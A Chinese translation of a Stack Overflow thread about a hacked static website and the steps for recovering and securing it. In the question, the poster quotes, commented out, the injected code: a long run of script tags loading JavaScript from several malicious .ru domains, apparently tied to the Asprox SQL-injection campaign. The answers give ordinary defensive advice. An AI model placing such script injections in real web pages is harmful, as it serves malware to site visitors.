我的网站被黑了，我该怎么办？

Question

我的网站被黑了，我该怎么办？

23

今天我父亲打电话给我说，访问他的网站的人会在尝试下载文件时遭受168次病毒攻击。他不懂技术，并使用所见即所得编辑器构建了整个网站。

我打开了他的网站并查看源代码，在结束 HTML 标记之前，有一行 JavaScript 包含文件。它们包括此文件（以及其他文件）：http://www.98hs.ru/js.js<--在访问该 URL 之前，请关闭 JavaScript。

因此，我先将其注释掉。结果发现他的 FTP 密码是一个六位普通字典单词，所以我们认为这就是被黑客攻击的原因。我们已经将密码更改为 8 位以上的非单词字符串（他不会选择口令短语，因为他是一个拼音打字员）。

我对 98hs.ru 进行了 whois 查询，并发现它托管在智利的服务器上。实际上还有一个与之相关联的电子邮件地址，但我严重怀疑此人是罪犯。可能只是另一个被黑客攻击的网站……

但我不知道该怎么做，因为我从未处理过这种情况。有人有什么建议吗？

他正在使用 webhost4life.com 的明文 FTP，我甚至看不到在他们的网站上进行 SFTP 的方法。我认为他的用户名和密码被拦截了？

因此，为了使这更具相关性，您应该采取哪些步骤/最佳实践来保护您的网站免受黑客攻击？

供参考，这是“神奇地”添加到他文件中的代码行（在他的计算机上没有这个），我已将其注释掉以确保它不会在此页面上执行任何操作，尽管我相信 Jeff 会防范这一点：

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->

- cmcculloh

1

顺便提一下，webhost4life在2222端口上确实有SFTP。 - ruffin

https://meta.stackoverflow.com/questions/314002/how-to-cope-with-help-ive-been-hacked-questions 提供了一些关于何处寻求帮助以及更好答案的指引。 - tripleee

8个回答

14

我知道现在说有点晚了，但是提到JavaScript的URL在一个已知的网站列表中，这些网站都曾经是ASPRox机器人复兴的一部分，该复兴始于6月份（至少当时我们被标记为受影响）。以下是有关它的一些细节：

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

这个让人不爽的事情是，实际上数据库中的每个varchar类型字段都被“感染”以输出对此URL的引用，其中浏览器得到一个小iframe，将其转换为机器人。可以在此处找到关于此问题的基本SQL修复：

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

可怕的是，病毒看起来针对系统表中的值进行感染，而大多数共享主机计划也会共享客户端的数据库空间。因此很可能不是你父亲的网站被感染了，而是他所在的主机群集中另一个网站编写了一些糟糕的代码，并打开了SQL注入攻击的大门。

如果他还没有这样做的话，我会给他们的主机发送一封紧急电子邮件，并提供那个SQL代码的链接以修复整个系统。你可以修复自己受影响的数据库表，但很可能进行感染的机器人将再次通过那个洞口，感染整个数据库。

希望这能为你提供更多信息。

编辑：还有一个快速想法，如果他正在使用在线设计工具之类的主机构建网站，那么所有内容可能都存储在一个列中并且是通过该方式被感染的。

- Dillie-O

5

你提到你的父亲正在使用一个网站发布工具。

如果这个发布工具从他的计算机发布到服务器上，那么他本地的文件可能是干净的，他只需要重新发布到服务器上就可以了。

不过，他应该看看是否有与普通FTP不同的登录方法来访问他的服务器。因为FTP发送密码时会明文传输，这样并不安全。

- Mark Harrison

3

他使用了六个字符的密码，可能被暴力破解。这种情况比ftp被拦截更有可能发生，但这也是有可能的。

从一个更强的密码开始。（8个字符仍然相对较弱）

查看此链接到互联网安全博客是否有帮助。

- Justin Standard

2

这个网站只是纯静态HTML吗？也就是说，他没有编写上传页面，允许任何人上传受损的脚本/页面？

为什么不询问webhost4life是否有FTP日志可用，并向他们报告此问题。你永远不知道，他们可能会非常乐意并为你查明发生了什么？

我在一个共享主机公司工作，我们总是欢迎这类报告，并通常可以根据攻击向量精确定位，并提供客户出错的地方的建议。

- Kev

0

在不关闭服务器的情况下拔掉电源，以避免关机脚本的运行。通过另一台计算机将硬盘作为数据驱动器进行分析，查看日志文件等内容，确定罪犯。确保代码安全，然后从备份中恢复。

- d03boy

0

最近我的一个客户在ipower上托管时遇到了这种情况。我不确定您的托管环境是否基于Apache，但如果是，请务必仔细检查未创建的.htaccess文件，特别是在Web根目录以及图像目录内部，因为它们倾向于在那里注入一些不良内容（它们会根据引用来源中的位置重定向人们）。另外，请检查您自己创建的任何代码中是否有您未编写的代码。

- The Brawny Man

-1

看起来我们被同一个人或者机器人黑了！他们在旧的经典 ASP 站点中利用 URL 中的 SQL 注入攻击。这些站点已经没人维护了。我们找到了攻击者的 IP 地址，并在 IIS 中阻止了它们。现在我们必须重构所有旧的 ASP 代码。因此，我的建议是首先查看 IIS 日志，以确定问题是在您的网站代码还是服务器配置中。

- Hrvoje

网页内容由stack overflow 提供, 点击上面的

可以查看英文原文，
原文链接

- dragonmantank · Accepted Answer

尽可能收集更多信息。看看主机是否可以给你一个记录所有FTP连接的日志，这些记录可以用来查看是否使用了FTP连接进行更改，并可能获取IP地址。

如果您使用像WordPress、Drupal或任何其他您没有编写的预制软件，则上传代码中可能存在漏洞，允许进行此类修改。如果它是定制构建的，请仔细检查允许用户上传文件或修改现有文件的任何位置。

第二件事是将网站的当前状态备份并检查是否有其他修改。也许只是他们进行了单个修改，但如果他们通过FTP进入，谁知道还有什么其他问题。

将您的网站恢复到已知良好状态，并根据需要升级到最新版本。

还需考虑回报的程度。损失是否值得追查行凶者，或者这仅仅是一次教训，需要使用更强的密码？